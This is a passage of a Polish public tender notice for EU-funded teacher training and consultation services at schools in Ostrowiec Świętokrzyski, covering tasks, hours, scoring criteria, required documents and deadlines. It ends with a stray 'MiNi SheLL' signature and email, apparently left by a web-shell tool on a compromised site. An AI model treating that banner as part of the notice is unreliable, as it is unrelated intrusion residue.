Obsługa programów  środowiska Microsoft Office i posługiwania się nowoczesnymi technologiami multimedialnymi. - Szkol./warsztat, 9 h
Konsult. grupowe z foniatrą z emisji głosu. - Konsult. grupowe, 6 h
Trening kreowania własnego wizerunku - właściwa postawa, wygląd i cechy osobowości pozytywnie wpływające na odbiorcę. - Konsult. grupowe, 6 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Polityka bezpieczeństwa danych osobowych w dokumentacji papierowej oraz elektronicznej. - Konsult. indywidualne dla d-ra, 5 h

Zad. 29. Realizacja RPW w Liceum Ogólnokształcącym Nr III im. Wł. Broniewskiego w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 14 
Temat:
Techniki relaksacyjne w pracy n-la - walka ze stresem, dbanie o właściwą postawę ciała.
Emisja głosu. - Szkol./Warsztat, 8 h
Obsługa dziennika elektronicznego.
Obsługa programów środowiska Microsoft Office (programy użytkowe pod kątem pracy n-la. - Warsztat, 7 h
Posługiwania się nowoczesnymi technologiami multimedialnymi - Prezi. - Konsult. grupowe, 8 h
Sztuka negocjacji.
Sztuka pozyskiwania słuchaczy.
Sposoby pozytywnego wyrażania emocji. - Konsult. grupowe, 4 h
TIK na poszczególnych zajęciach edukacyjnych.
Przepisy prawne wspomagające n-la w profilaktyce zdrowotnej. - Konsult. indywidualne dla n-li, 10 h
Techniki mediacji i negocjacji na linii przełożony-podwładny. - Konsult. indywidualne dla d-ra, 5 h

Zad. 30. Realizacja RPW w Liceum Ogólnokształcącym Nr IV im. Cypriana Kamila Norwida w Ostrowcu Św.
Obszar wsparcia: Ocenianie kształtujące
Osób: 18
Temat:
Ocenianie kształtujące - metody. - Szkol., 8 h
Wypracowanie indywidualnych i zespołowych metod oceniania kształtującego.
Sposoby monitorowania i doskonalenia przyjętych rozwiązań. - Warsztat, 7 h
Gromadzenie i analiza danych dotyczących skuteczności wprowadzanych metod. - Konsult. grupowe, 8 h
Doskonalenie umiejętności oceniania kształtującego dla grup n-li, np. wg przedmiotów. - Konsult. grupowe, 4 h
Doradztwo planowanie indywidualnych działań na temat oceniania kształtującego, radzenie sobie z trudnościami. - Konsult. indywidualne dla n-li, 10 h
Prawo pracy i oświatowe w pracy d-ra. - Konsult. indywidualne dla d-ra, 5 h

Zad. 31. Realizacja RPW w Technikum Nr 1 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+ 
Osób: 20
Temat:
Prawidłowa emisja, estetyka i higiena głosu czynnego n-la. - Szkol./warsztat, 8 h
Jak radzić sobie ze stresem i sytuacjami stresogennymi w pracy. - Szkol./warsztat, 7 h
Techniki relaksacyjne - jak rozładować negatywne emocje, frustracje, gniew. - Konsult. grupowe, 4 h
Nowoczesne metody i środki dydaktyczne. - Konsult. grupowe, 4 h
Program Prezi  lub inny do tworzenia prezentacji multimedialnych. - Konsult. grupowe, 4 h
Tematyka wynikająca z realizacji szkoleń. - Konsult. indywidualne dla n-li, 10 h
Obsługa programu Microsoft Office Excel. - Konsult. indywidualne dla d-ra, 5 h

Zad. 32. Realizacja RPW w Technikum Nr 2 w Ostrowcu Św.
Obszar wsparcia: Techniki uczenia się i metody motywujące do nauki
Osób: 19 
Temat:
Techniki uczenia się i metody motywujące do nauki.
Techniki efektywnego uczenia usprawniające szybkie czytanie. - Szkol./warsztat, 15 h
Techniki efektywnego uczenia usprawniające zapamiętywanie - techniki zapamiętywania. - Konsult. grupowe, 12 h
Techniki uczenia się i metody motywujące do nauki. - Konsult. indywidualne dla n-li, 10 h
Nawiązanie, zmiana oraz rozwiązanie stosunku pracy.	 - Konsult. indywidualne dla d-ra, 5 h

Zad. 33. Realizacja RPW w Technikum Nr 3 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 19
Temat:
Prawidłowa emisja, estetyka i higiena głosu czynnego n-la. - Szkol./warsztat, 5 h
Techniki relaksacyjne - jak rozładować nagromadzone  negatywne emocje, frustracje, gniew. - Warsztat, 5 h
Prawo pracy n-la 45+ w przepisach oświatowych. - Warsztat, 5 h
Jak radzić sobie ze stresem i sytuacjami stresogennymi w pracy. - Konsult. grupowe, 12 h
Przepisy prawne wspomagające n-li w profilaktyce zdrowotnej. - Konsult. indywidualne dla n-li, 10 h
Nadzór pedagogiczny. - Konsult. indywidualne dla d-ra, 5 h

Zad. 34. Realizacja RPW w Technikum Nr 4 w Ostrowcu Św.
Obszar wsparcia: Nauczyciel 45+
Osób: 20
Temat:
Prawidłowa emisja, higiena głosu czynnego n-la.
Jak radzić sobie ze stresem i sytuacjami stresogennymi w pracy.	
Techniki relaksacyjne - jak rozładować negatywne emocje, frustracje, gniew. - Szkol./warsztaty, 15 h
Wzmocnienie kondycji psychofizycznej n-li, pomoc w profilaktyce zjawiska wypalenia zawodowego.
Budowa zespołu nauczycielskiego - współdziałanie i współpraca - komunikacja interpersonalna.	
Trening asertywności, sztuka negocjacji, sztuka pozyskiwania słuchaczy, sposoby pozytywnego wyrażania emocji. - Konsult. grupowe, 12 h
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Nadzór pedagogiczny jako forma kontroli zarządczej.	 - Konsult. indywidualne dla d-ra, 5 h

Zad. 35. Realizacja RPW w Zasadniczej Szkole Zawodowej Nr 2 w Ostrowcu Św.
Obszar wsparcia: Techniki uczenia się i metody motywujące do nauki
Osób: 17
Temat:
Techniki uczenia się i metody motywujące do nauki.	 
Techniki efektywnego uczenia usprawniające  szybkie czytanie.	- Szkol./warsztat, 15 h
Techniki efektywnego uczenia usprawniające zapamiętywanie - techniki zapamiętywania. - Konsult. grupowe, 12 h
Techniki uczenia się i metody motywujące do nauki. - Konsult. indywidualne dla n-li, 10 h

Zad. 36. Realizacja RPW w Zasadniczej Szkole Zawodowej Nr 4 w Ostrowcu Św.
Obszar wsparcia: Wspieranie pracy wychowawców klas - bezpieczna szkoła
Osób: 20
Temat:
Rola wychowawcza środowiska szkolnego w życiu ucznia.
Metody rozpoznawania potrzeb wychowawczych uczniów.
Zasady planowania i monitorowania oddziaływań wychowawczych. - Szkol./warsztaty, 15 h
Kompetencje komunikacyjne n-li w pracy wychowawczej.
Współpraca w zespole n-li - wychowawców klas w pracy z uczniami. - Konsult. grupowe, 12 h
Konsult. ze specjalistami:
- psycholog. - Konsult. indywidualne dla n-li, 10 h

Zad. 37. Realizacja RPW w Szkole Podstawowej w Szewnie 
Obszar wsparcia: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Osób: 23
Temat:
Ocenianie kształtujące.
Techniki uczenia się.	 - Szkolenia/warsztaty, 15 h
Zasady opracowywania testów szkolnych - pomiar dydaktyczny.	
Analiza ilościowa i jakościowa wyników badań osiągnięć uczniów. - Konsult. grupowe, 12 h	
Konsult. ze specjalistami. - Konsult. indywidualne dla n-li, 10 h
Zastosowanie i wdrażania instrukcji kancelaryjnej. - Konsult. indywidualne dla d-ra, 5 h

Zad. 38. Realizacja wsparcia eksperckiego w ramach realizacji Sieci Współpracy i Samokształcenia 
Tematyka sieci: 
1) Pozapedagogiczne obowiązki d-ra szkoły.
2) Rola d-ra w promocji i budowaniu wizerunku szkoły. 
3) Praca z uczniem młodszym.
4) Praca z nowoczesnymi technologiami TIK - bezpieczny Internet. 
5) Jak wspierać dziecko w uczeniu się matematyki.
6) Skuteczne sposoby zachęcania uczniów do czytania
7) Promocja i budowanie wizerunku szkoły/placówki.
Miejsce wykonania: ul. Kilińskiego 19, 27-400 Ostrowiec Św.
Czas trwania wsparcia: 56 h szkoleń/warsztatów (2 x 4 h = 8 h na każdą sieć)
Osób: w 5 sieciach 125 osób, w 2 sieciach 34 osoby.

1. Każde spotkanie grupowe/szkol./warsztat/konsult. grupowe i indywidualne zostało podzielone na moduły, zawierające tematykę do realizacji.
2. W ramach zadań od 1 do 37 są realizowane formy wsparcia: szkolenia/warsztaty oraz konsult. grupowe i indywidualne dla n-li i dyrektorów.
3. Dla zadania 38 realizowane są tylko szkol./warsztaty eksperckie:
a) Szkol./warsztat, szkolenia/warsztaty eksperckie - aktywna metoda szkoleniowa,  angażująca uczestników w różnego rodzaju ćwiczenia, gry, symulacje lub inne działania mające na celu nabywania wiedzy, doskonalenia umiejętności oraz kształtowania postaw uczestników;
b) Konsult. grup. - (wykład, konsultacja, warsztat, szkol.) mające na celu zwiększenie kompetencji uczestników w zakresie tematyki objętej wspomaganiem;
c) Konsult. ind. dla n-li - (indywidualna porada, pomoc przy wdrażaniu zmiany, rozwiązanie problemu, zinterpretowanie danych - powodujące wzmocnienie/pogłębienie wiedzy/umiejętności n-la/-ki w określonym obszarze);
d) Konsult. ind. dla dyrektorów - pogłębienie wiedzy, umiejętności, rozwiązanie konkretnych problemów w określonej tematyce..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 38.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Brak wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kryterium - cena, podlegać będzie ocenie wg wzoru:

                minimalna oferowana cena brutto
	X = ----------------------------------------------- x 70 pkt
                   cena badanej oferty brutto</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kryterium - wiedza, podlegać będzie następującej ocenie:

Za posiadanie certyfikatu jakości usług instytucji szkoleniowej w postaci akredytacji placówki doskonalenia nauczycieli przyznanej przez Kuratorium Oświaty zostanie przyznane 5 pkt. 
Za posiadanie certyfikatu systemu zarządzania jakością kształcenia/szkolenia wydanego na podstawie międzynarodowych norm ISO zostanie przyznane dodatkowych 5 pkt.

Kryterium - doświadczenie, podlegać będzie następującej ocenie:

Za wykazanie, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał usługi o tematyce identycznej bądź zbliżonej do przedmiotu zamówienia o łącznej wartości brutto:
50 000 zł - 100 000 zł - 2 pkt,
101 000 zł - 150 000 zł - 4 pkt,
151 000 zł - 200 000 zł - 6 pkt,
201 000 zł - 250 000 zł - 8 pkt,
Powyżej 251 000 zł - 10 pkt.

Za każde wykazanie usługi (jednak nie mniej niż 5 usług) o tematyce identycznej bądź zbliżonej do przedmiotu zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, zostanie przyznany 1 pkt z zastrzeżeniem, że punktowane będzie maksymalnie 10 wykonanych należycie usług. Wskazanie większej ilości usług nie będzie brane pod uwagę, co do wagi kryterium.

                   liczba punktów badanej oferty
	X = --------------------------------------------------- x 10 pkt
                najwyższa przyznana liczba punktów

Zamawiający wybierze Wykonawcę, którego oferta otrzyma największą łączną liczbę punktów 
w ocenianych kryteriach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Wiedza - 10</li>
<li>3 - Doświadczenie - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.staszic.ostrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Projektu: ul. Kilińskiego 19, 27-400 Ostrowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2014 godzina 15:00, miejsce: Biuro Projektu: ul. Kilińskiego 19, 27-400 Ostrowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com